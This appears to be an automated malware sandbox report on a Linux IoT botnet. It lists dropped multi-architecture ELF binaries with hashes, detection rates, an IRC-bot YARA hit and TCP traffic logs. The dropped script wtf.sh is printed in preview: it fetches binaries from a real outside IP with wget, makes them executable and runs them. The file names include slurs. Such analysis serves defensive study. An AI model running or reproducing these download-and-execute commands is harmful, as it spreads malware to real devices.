                                                                  Entropy (8bit):7.891027797269162
                                                                  Encrypted:false
                                                                  SSDEEP:768:K0xA0rEptsBMiAGimOwSH+DhKZBqHLkom8fvm3RIIHe4bZsI:3xAXHoM1G9QHXZBqH8823uV4b+I
                                                                  MD5:767AE994C753C82EBB6EFAE8D818102E
                                                                  SHA1:A93C35DBFF0D38D13E5DE5D0D7A512F9BE7E93F4
                                                                  SHA-256:84017DA225B3D2800C184ED565D0DC04C2E277C5A78409F3C1633D2BB5426927
                                                                  SHA-512:44A8A543C70B63BCDB5F48670DB8FBBC845070281AEC87BD25EC90820EE15B44D7903CF6466ACEB9D04B91B742984DA73533CD4A25BD519B27A0D7497019F5D8
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: Linux_Trojan_Ircbot_bb204b81, Description: unknown, Source: /tmp/faggot (deleted), Author: unknown
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 34%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF..............>.....`.......@...................@.8...@.....................................J.......J................................VR......VR.............................Q.td....................................................>..]UPX!........p)..p)......`.........!..ELF......>....@..e.....&#.8.-;...............!....I.E.....Q.{vB..-.47.#..Q.td........@....!.......I...o..H.......d.........=o...%..UH..t..8.......!.o.o...H......H..u.0......t...!A........y?...f.7.....U$P...&Q.l.f.,.\=. mt.%s..6".."I...A..?H.m.}..1...^@./..PTH.. ]...g@.....I..........>.+%\$..l$..L.d$.L.^^....t$.|$..8A....oR.M..E..9..........{yko..t*.E.H..L.CX.Jw.L. A(L.0...k-8.=t <.....u.....H.. ..........,1........$..~...m.N..1.U.A:h.t...9.t..n{.p@.wA8.u.A1...P...........m{?,.=fQ..`.s7....\..N.........H:..,.2.4&. #..........#uz..#...V.."..!F..q/!.v.!.......k..+.,/..%..f..E.J..!.[.6........_..2O...P....h...w$58@..y.HPX`h.v.m.D.7....t..G........D$.t.D.o.E..t.D.{..{..H...Ic.H9.r.E....L.e.vwk...E..90

                                                                  /tmp/gay

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):11978
                                                                  Entropy (8bit):7.97036873295155
                                                                  Encrypted:false
                                                                  SSDEEP:192:BYYPMp34wxkvUDdm8AnSRN0qxxqzwm6a2pgzx2urrQOeLNxVcnvtyNttLI:BTGoo4Sn0qxqzwmCWzDrr3eLNxgt8ttk
                                                                  MD5:2F4E349ADD535562D1E34C4EB5D8A122
                                                                  SHA1:636C788324F22FCAD48ADAF3CDFD623D46674B6F
                                                                  SHA-256:F0283406AAFABE466FF5CAF8F7F77B38B59FF2C1B40FFC5EE332CA6F242FF567
                                                                  SHA-512:87A50D99CD7F802E8F6F4EC5696F154305A42802AB784976C785D1EA89AEDE30ECD2C1A6AB222B0ADFC09FAD0367E9633F5345BF45288F1A335A60DB9FB2A9F0
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:.ELF...a..........(..... ...4...........4. ...(...................................................................Q.td............................t.6.UPX!........h5..h5......S..........?.E.h;.}...^..........fE..j.l..0z.$..G.sB....E....?...1...........F.i!.d.t.-...p...P........m...t.O.&.]...$S.....xV.U.t...U.t5...3tn.7.E.;V7,.......UK;O~..\V..b.:..}0V.....oD.7.t.T.m.9.)...0.#.....D...=...y.pZ1....+.6..}abf.fqc..Q(..Z..On.y..U..X.G....$..N.J..?.....=D.A............ u.^Q..........x...p.....r.p".....]....'..8(.+@;~.xE.L?...)3/5..k....'..}.c\..Z..m..l$.9...&.<.oB..._.q./....E......>Ja'.$.....S. ......,..D............=Zkn......7...J...rn.R.Y..k@.n..+..o.I..?..l....W.Lyq.T.x.U....).E5...A....<w.h...|.P!.e.J..iU.2DC.;.<`.....Bl..mi+.$......Q......p.Y..y.}.5..NA.&#..=......c.dQ...........qO^e.../.7.P=u....d.dm..x.M.......2.P...I.p.r#F.}.^i<.e.J......4..{~..7:~..F..Q....".O.wVLf...w6Lw....&n....j3.CC%b...n%QL..y.'.W...xA...uI....'.SJG.U.=.)E...:4O

                                                                  /tmp/lmao (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):36568
                                                                  Entropy (8bit):7.925100931125813
                                                                  Encrypted:false
                                                                  SSDEEP:768:TiZ+2OqcwfYzjJRYYHy9/RnByzoYUua+P1ANF1+WX:TiZ+HzjJaYO/jyzUuDGNz
                                                                  MD5:54922A385EAA2BFAE7B9D36CCA0DEB93
                                                                  SHA1:E4C60FDF9C0A8D2B691A79D847B56D3BA0330088
                                                                  SHA-256:DCEC103C40593F614DEE1E3F69E6E334B0C0EC22F2F46D1F8F48909A23716011
                                                                  SHA-512:E0A1B5C17D07D71F59B3270888B859BCBACE374531066B198B32A829114C98A82B94072C5BC1A264D61F69D93F1F55251C9C70B676B8B4B432ADFA4322D0202E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 33%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF....................hz..4...........4. ...(..........................................i...iF..iF...................T.UPX!d.......t...t.......T..........?.E.h;...#.....b.L#3.q..=..h......._q@i......y)w\..4..=c-n..4.{..=-y....,.w...u.............).;...V..*F..6.r.....\Z.O1`|..l{.A.,L.z.P.....r.7..}Z.*-3.9...........G.6.j......\..8..v.D(5..................A*.x.e....e.O......v..E.O....j...,.NTKn..hF.l1.=.....3y.h.L+..n.=.L..R).-/Iv..&9/....{..Dl...Z.X.tt.....z...\.....~..0Ba.6Cey.6.....Y1...;..9n....1...-..R.].=....K.L.....v.BK..Vv,.......`.+.j..C.].I....qQ^s..7..I..)..M..A.-3.6.u..8..e..L.1h..:.K....~J.....\S....L.}U....EnX..".Cj.$53..7G...k8.E}...!..1.e#W<.!_..u!>.F+6....L.WO+k/...AP8&GR9..eEW..T...|..T..d.M.D[..X9.pr......s.........D....wq/...t....x.~..E..z.E.9.<&.'yt&88.J..@...fT..p.....qg..#..m:........j.....V.I..G(aQ....mb..j.1b(......p.^*.^..$..7....4. N...3..(...:..^|k-..3...r..S.ZA.q..o....".I=...:I..3.UO$.g..[..y.....p.L..*.J.n..'.

                                                                  /tmp/lol

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):35440
                                                                  Entropy (8bit):7.921384200993703
                                                                  Encrypted:false
                                                                  SSDEEP:768:fTFkLUYf1J6CdJwcNYk0zMZx2pIdti3YTrylUJgGlzDpbuR1JUJuT:fpkLDhwEn17i3YTeMVJuOoT
                                                                  MD5:B37480B8866CCF0F713316C86CF3C96F
                                                                  SHA1:BBF4089B71A6F748510202AB017FA743D9F55C86
                                                                  SHA-256:C9FA07137B268BAE37D93E0B25AC3244E37906F5773780D11A2978726BAE23B0
                                                                  SHA-512:302980A597F6836B86454972DC00D35F3C6F22FBA8C2C37169D15485889F05C844E174EEDE7B49FC9C0A8FB7D1D19C754A7B577E52D375D1F14B922E709E7B72
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 30%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF......................u....4.........4. ...(.......................<...<..............a@.Fa@.Fa@.................K..UPX!.h........|4..|4.......U.......?.E.h4...@b..) ..]...E..7.vA..r..@.]...R.4.s.6.j..p...#..6.>....uC.v...j......o,..p............y..`.}.@.?#...f.~.......{.d.J.g.....I].}.X.T....y.....m.*[...jao.F.....7...7....R..n.........R..d.4......#E..r.#.\..h..'....<....J9@.z.d2..@..h~1!q.Z5*m....t....e..J.dY{.7....IW...P^lM.O....gUu...xt..D_A."...+A.=....W..d.{...}.........=.*v}Dn60...9}...bG..bY..K..A.N..m..l.1.u...Qd.....i..//..~..!.Z...w.B......lL.....J@.\...)<........../}).vlD......}&..E#.../...L..=.Tf.[.t.5:ayVYk.W.{.......t...:.\.1!y...).D... ...p.....OA.4.=3(.u.v....w]}wp<..I.P.1..1%........N.....n?.>.C..DP......y.N.L..._ Y...z$q.....Fv..T....:..x.ETG......._!.N/....f.n.(8D..@.*3.......-^.. .=Y[p.<..t...L........ue..v.j,.;K...Cq.F.......R.b.D..Z.0R..p....$..[....B..t.^.F.<{eu>..._a3......j.:.;..@...E...$.].........6.'Z^..o{.Y.

                                                                  /tmp/nigga (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):31580
                                                                  Entropy (8bit):7.88473634757989
                                                                  Encrypted:false
                                                                  SSDEEP:768:Sf19U+aM5R3mwKSsMX+h9EqrplmR/y1ln:Sf8+aM5R3mAK9flmR/MV
                                                                  MD5:9F3E360EAF94D852743151AE58470657
                                                                  SHA1:9A8ED1C2C025491BF89AA058E960E6BCDF5A1E43
                                                                  SHA-256:11257A4079DA41130AB62A1CFCDDC6B5CE9B8C8EC66754362FFA9C58C3575BC5
                                                                  SHA-512:CCEDB5A5F47D0C9B9D67EC418F636CDE6291FADFA29E1DC737CE81CF24BFB71DCB567B8E24490C98C44A8E5DCFBB0A9DEB85636E3568D05231CF0EF065EC372D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 33%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF....................p...4...........4. ...(.....................Sz..Sz...................m...m..................Q.td..............................4UPX!....................]........?d..ELF.......d...m...4..... .(......m..-.#.|.....6............{.d.....Q.td...`.#.........H......p...F..w_..U..S.......w...x..X[.]..]..$..+....=.........t..5....$.........u....w...t.+.h|z..........}o..8..S..&$U*T....w.Z....;.Rj.h.-u..3@.~..d.._.;.b......1.....^....PTRh.Q@....QVh ..d........WVSC.]...}......u.#.....t._~..e.[^_.L.....q.HuN7....E.P....e(j.......&..$/.f...].%..SP...g...M..QP...Cj&17.......E.w.......o_..:Z.u..2t...8.t.@...;%u...=..........n......~.............<.2....$#...../..uq....N..[... .........QQ#.....RR.a.d.,.*%.=.L.$xdS...p.#........<.\$T.t$P...w..?..#<...f.......B{....F....D$.t...........S.........T$0.....9.r.PPj..~..L$$Q...v..y.H..&.9....~=....i..o...Q..o._.Gb.A.f........9n.o..u.L..).....0...1.0.Ox..tG...#.=..i...,..............8H.....s../PU... .]..|....qDV...

                                                                  /tmp/nigger (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):36932
                                                                  Entropy (8bit):7.963300693747042
                                                                  Encrypted:false
                                                                  SSDEEP:768:je8Kx4t72q837H3lzMrny1lQim63elQ9q3UEL1w:je8Rt72quHlUild/MLK
                                                                  MD5:06B0A235DC0D0B6AA3DAD1DCD99363F2
                                                                  SHA1:45AC261435D9BED12A3B827657A3AAFB5CA39A38
                                                                  SHA-256:8BD63A4C6212AD0299685891B997B4E0AA85CDDBBAD29959A3CF39B530EB8178
                                                                  SHA-512:F97E55540A6B364E816DC1163BA3C1D331C8E6BF6A0D03E8F7EFFC2B2A8BF27693B3B5D39D61DB5E7EACE018E27D0424A92E27007FF031011931329709DBEC4D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 38%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF..............(.........4...........4. ...(.........................................D=..D...D...................Q.td............................?..`UPX!........dU..dU......T..........?.E.h;...#..$..1)......b*.K.....E...%.P>v.2..~......4>.Y....n.N?....s.T...A..R..E..|z...P........m...t.O.&.e....A....G.$oP....Z..$..X..i........%.A%......B.....&...5....l.x3../..8..|.....+.........1.PO.&.........@-;N.a5.....K.*.n...Km.C[C..o~[7.+RT.BgrB...L.o.EuRB....S\..W.....]......d...E...R8.."D>..d.@.I.]tm..$..9..0....fR\.2.$..E...W.0.|.P..M..z.L.cF.....3.l......`..|.;.r..<...d<."?...i....K...Bn...6W.k.....#.r6....qK].....+/Z..........Y$.^.0.P...w.C2.B.6.z...Cq.[.o...w.7.i+..k..x....F..|_P.^7.|<...t..;.D#.....H.._....]...Lj..$Y.e....H~...*..6=..|............?2.c..z.{w.....Y.#K..}....8E...j.%.1."N.7Q...........&.'.Ws..[.4m..l^c.&.......`.06....e5(Ik2..+..|G=...q.4].4...r...7...`..=.w.....5.....K...ySod..;*.....4mU.....3.#.M..s.....+..md../I..M1.>...o.......PS

                                                                  /tmp/retard

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):32736
                                                                  Entropy (8bit):7.953908662254852
                                                                  Encrypted:false
                                                                  SSDEEP:768:0bGoT5Jk+nnjeYAMKwrk7uqe6E1BFUWaDAVs3UozV:0a25J+YZKBw712DAYzV
                                                                  MD5:F98206DEB724E062BE9552C0E8D4369B
                                                                  SHA1:8C0E23056AC72946E0F9C70A9408699790B71AD7
                                                                  SHA-256:B7F972C2FFA6946D53734709FC4626EA952E3317229417B342796FDFD3CE99A1
                                                                  SHA-512:675666120626D61F102338C98ADE6232A1170961BE0E3888CD111565D96F6D33990C0A9544BF2636E3756DDDD68112A3D5E5B4098AFD2A3EA95D823A824FD612
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 23%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF...a..........(.....@...4...........4. ...(......................~...~..........................................Q.td............................t.6.UPX!........\'..\'......S..........?.E.h;.}...^..........f<.&1...........7...5...3y.q....GSO..B...R)...;2..E..H$.\!...j...P........m...t.O.&.]...#.n....xV.U.t...U.t5...3tn.7.E.;V7,.......UK;O~..\V..b.:..}0V.....oD.7.w....a.Y..........@C]..x.ji..,Ef.....K..#TM..q..K..(...~...S.M.J.r$...*../P.........j.H.+..S.......l...z.e...~}KT.3i..,.r.*N-..D.|".Bg....u..B.c.2....N...@c...|g.......Wb.~.U S0Hb&mi".......X:.....6$(......v(....PN.UL{.>..1C!...E..I.h...J.R,.,e.S..5....b.<........7.Oa..u.......@...l*....<.[.Bz 4|.-..&.l.Y......6.9A.!.k.]...y.][..9....y..r.w..Fu..........\p.3.T......J........,.A..:}h..;.jC..n..q.'WH...&......["6.........}..}U....K....|w....Za......v$..f. \......\5.aq1m5....}?.W....DESTK.S...6?.i..w."....../...7......,.N0..E.c.5O..}......zC.....)...9....u.H.......y..^.A......(..n

                                                                  /tmp/shit (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):7.957417542337069
                                                                  Encrypted:false
                                                                  SSDEEP:192:/kvxjtpoQxk1W5IpYt0q08WnvUisT8K9U+rVVhxHl/vQba:/kvxz355IpsPMvI8K9U+5ZdvQ2
                                                                  MD5:470E1D1D14C1D6912253A23C7CE49AD0
                                                                  SHA1:4566282DCA22E6FB0A815CD9C79904F37E6AD5F5
                                                                  SHA-256:C1FA7DCF5262E4C0D458653D934C9E7029BAF123C41E2FBC36888305EBB74A06
                                                                  SHA-512:D0DBFE69369991D0D276D8606064EDCAE431B47F95CF0D9D2AE68FC124528DEC9A01262D2825399FADFE3093705485EA7922A9348AAE46CE6B20548521B591DC
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:.ELF..............(..... ...4...........4. ...(......................................... m.. m.. m..................Q.td...............................aUPX!.........g...g......j..........?.E.h;...#..$...o.....,Y.....;G%H....m.....di.o.Y..S.oRw.i...<X..#.......-....sSp..Lo>K,...B.pS...dt..[....P........m...t.O.&.e....A....G.$oP....Z..$..X..i........%.A%......B.....&.......{`.3...4Q...0.o..2?.C......G.....6.v.. ..l .....\.Q....R..SZ@zF..Y.X.....[&.Z......b>9..wc.3.61...8d.?{t..%.^.........o0q.:..._"#........-.g..r......D0=....<....i..}.......l.^...[S....H......'j..nsA.Dm...W.S.....P,........t....:x*.Z,.....+......V.ay[......N1U4...Q..4....IB.....i.XkF.(....N.w.]....F.>7.+E..1n....Z..ErA.2t.W...+..i....b.>..G...%..yW}.H....h...'P....U. .aC9....%.-e1.....~^pEd..B..F...}>>y3..'......XA\......G }x.....n.T.@D.....g.....$.D...q.LTnE.w...Q.Xd\c.hw.u.4..m;.....t%!1...:...UB.wBJl..3..H....R...DTx...0L...;..@....4).l..weuX*dZP.Bx..~l<.&.*...z.6u....=i..P.9.R@.

                                                                  /tmp/shiteater (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                                  Category:dropped
                                                                  Size (bytes):82376
                                                                  Entropy (8bit):6.046913393021711
                                                                  Encrypted:false
                                                                  SSDEEP:1536:8QBkpVPZwqUSrGUBjTy8zezRzm1O8uACGCvjblDW1aZFjNu:8QBsFWMyUBjTGJn8lCJQ1aZpNu
                                                                  MD5:94724E3B2AAE268C36BC4D6B1071F961
                                                                  SHA1:4760D6CF72B8BFB5D3472047669631A6C6F6F4CD
                                                                  SHA-256:966065B717A06D4B8EF6952660504D55DD592C5E75B48C384D1442ADD300D71C
                                                                  SHA-512:BF796B4BBB2BA889D762C0E466EF1A65E7ADC09DE2AA89E82DE1EE60C6969A7C0EA3D5F5A0D7E086C211278A78ABAD239A605600A8BE1073686009F597C714FD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 44%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF.......................D...4..@8.....4. ...(......................<^..<^...... .......<d..\d..\d.......x...... .dt.Q............................NV..a....da.....N^NuNV..J9.._.f>"y..\| QJ.g.X.#..\|N."y..\| QJ.f.A.....J.g.Hy..<`N.X......._.N^NuNV..N^NuNV..A.....J.g.Hy.._.Hy..<`N.P.J...\tg.A.....J.g.Hy..\tN.X.N^NuNV..N^Nu.. . OHWHQHy....Hy....HP/.Hy..f~N.....J.NV..H.8 ............E.....N.r...g...J.n...N.r...g J.f$/...a....@a....VHx../.a....2B.a....B..9..`.J.o."y..`. Q.(..g.X.B.R...g. Y.(..f./...B..././...B.../. PN.O...B.a....ZL.....N^Nu 9..`.f..<B...`. 9..`.f...B...`. 9..` f...B...` 9..`$f...B...`$ 9..`(f|B...`( 9..`,fPB...`, 9..`0f.B...`0 9..`4g...`.Hx../.a....NP.B...`0 9..`4g...Hx../.a....0P.`...Hx../.a.....P.B...`, 9..`0g.`.Hx../.a.....P.B...`( 9..`,g..v`.Hx../.a.....P.B...`$ 9..`(g..H`.Hx../.a.....P.B...` 9..`$g...`.Hx../.a.....P.B...`. 9..` g...`.Hx../.a.....P.B...`. 9..`.g...`.B...`4NuO...H.?>&o.<$/.@p...d......<....g....k.....<....g....+..g...&.].B...*..(....b..~E...Hx../.

                                                                  /tmp/what (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):32544
                                                                  Entropy (8bit):7.94952935975405
                                                                  Encrypted:false
                                                                  SSDEEP:768:vDHXhRy9tszR3aaY5t9TYPZTxlGht34uVcqgw09RS:TXhRmuzR3Lg0RPGj34u+qgw09RS
                                                                  MD5:08C0F69B14D04E2ABA9DDE59F5F2F4DB
                                                                  SHA1:9434E6BD5F11877E19CE78FBDBE8B6E77331BAFA
                                                                  SHA-256:009E150B464AA2D65B19154EC75B8A708A7410E0243964EAB173D1709479B89E
                                                                  SHA-512:8E42C7F75AE71B1F757245C3DFEB0E645A5C08BF542A2B4F9FA2FE0A17AF9E165D4DF324A60EA8A51D14560BC7E3147D2CEC485727441640ED57F5085746C0A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 43%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF......................l8...4.........4. ...(......................~ ..~ ........................................dt.Q................................UPX!..........%...%........W.......?.E.h4...@b............z.).[.Q........4+j.........y[.RW.j.k.1../.9..[t....Em.o.......i........J.[...(..v......./MN.58.S!.O>u.s.".v........M.._../..gM..3.....f.......l.z-4..]....Tu....u.g8.X.tn7...#n..+...Lj:..t.$nZ.......P...0.....Xg..\.A2....#.....9.b.Q&B..;q...0.\*n..................wA[V3*.._.w..3.:bT.}>...B..?+-dg.F_.4...v.bB.mpF.W..lg;WQL.i..+.SVj..w....A`.7$.dDG..C).......h:.G...J.>..y..].6.N.D..!..e..4.....g.*I.......F.Gd0c.'.[#....~....^Q.4GSAl.....0.L..W...|{...l....2....].r...g.^.c.ejr.!^...m.n..).F.n`+......+....{.gG.....U(}..@.. ..%;.$....Q...j....d..,..... k.|.^.YQB..5...P..Y..(..*.n....d.^2..4...&.E%..7..z...??./........k..SQ.....]B......6.W...wBL..L|.:..e.............H......e..z....W...w...S....p ..>T.rNE.j...<r..`;B..r.........7.k...P.......

                                                                  /usr/bin/wtf.sh

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1612
                                                                  Entropy (8bit):4.658126993935049
                                                                  Encrypted:false
                                                                  SSDEEP:24:UDB9SHP7m70SmhJUFlHNIeGkiFZPhu3pLKAXKh5xa:U19SHP7mXmh2n/i7Phu3pLKAXKh7a
                                                                  MD5:1F5487FCB966D06EB4FA323D01CAC5CA
                                                                  SHA1:ADE64C1FD8C202FFEE79B84F733D4EC223FDB8FC
                                                                  SHA-256:3D29748414C2E043BB262177CB35B83DBD0F8329397B59E1660651B2BEDC1488
                                                                  SHA-512:90E5E271736674930C2901F39AFB812ABA50032F8B504A13286E5EE3978ADD1EAE924D3CE40F80C3DEA67B676167605E348B0F1857AA69199894A3B0125C23A4
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://94.156.8.244/mips; chmod +x lol; ./lol 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://94.156.8.244/mpsl; chmod +x lmao; ./lmao 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot http://94.156.8.244/x86_64; chmod +x faggot; ./faggot 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay http://94.156.8.244/arm; chmod +x gay; ./gay 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O retard http://94.156.8.244/arm5; chmod +x retard; ./retard 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger http://94.156.8.244/arm6; chmod +x nigger; ./nigger 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shit http://94.156.8.244/arm7; chmod +x shit; ./shit 0day.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigga http://94.156.8.244/i586; chmod +x nigga; ./nigga 0day.cd /tmp || cd /v

                                                                  Static File Info

                                                                  No static file info

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 29, 2024 10:40:17.187232018 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.392318010 CET804312094.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.392429113 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.394347906 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.598308086 CET804312094.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.598972082 CET804312094.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.599050045 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.599077940 CET804312094.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.599129915 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.670123100 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.719347954 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.874516010 CET804312094.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.874634981 CET4312080192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.924772024 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:17.924881935 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:17.926328897 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.129421949 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.129878044 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.129950047 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130177975 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130223989 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130239010 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130278111 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130361080 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130389929 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130526066 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130549908 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130840063 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130875111 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.130907059 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.130938053 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.131088972 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.131129980 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.131150007 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.131186008 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.131206989 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.131238937 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.333620071 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.333635092 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.333640099 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.333693027 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.333811045 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.333811045 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.333842993 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.333842993 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.334997892 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335036039 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335048914 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335095882 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335273027 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335284948 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335297108 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335300922 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335313082 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335323095 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335347891 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335362911 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335382938 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335382938 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335397959 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335433006 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335439920 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335455894 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335468054 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335484028 CET4312280192.168.2.2394.156.8.244
                                                                  Mar 29, 2024 10:40:18.335489988 CET804312294.156.8.244192.168.2.23
                                                                  Mar 29, 2024 10:40:18.335491896 CET4312280192.168.2.2394.156.8.244
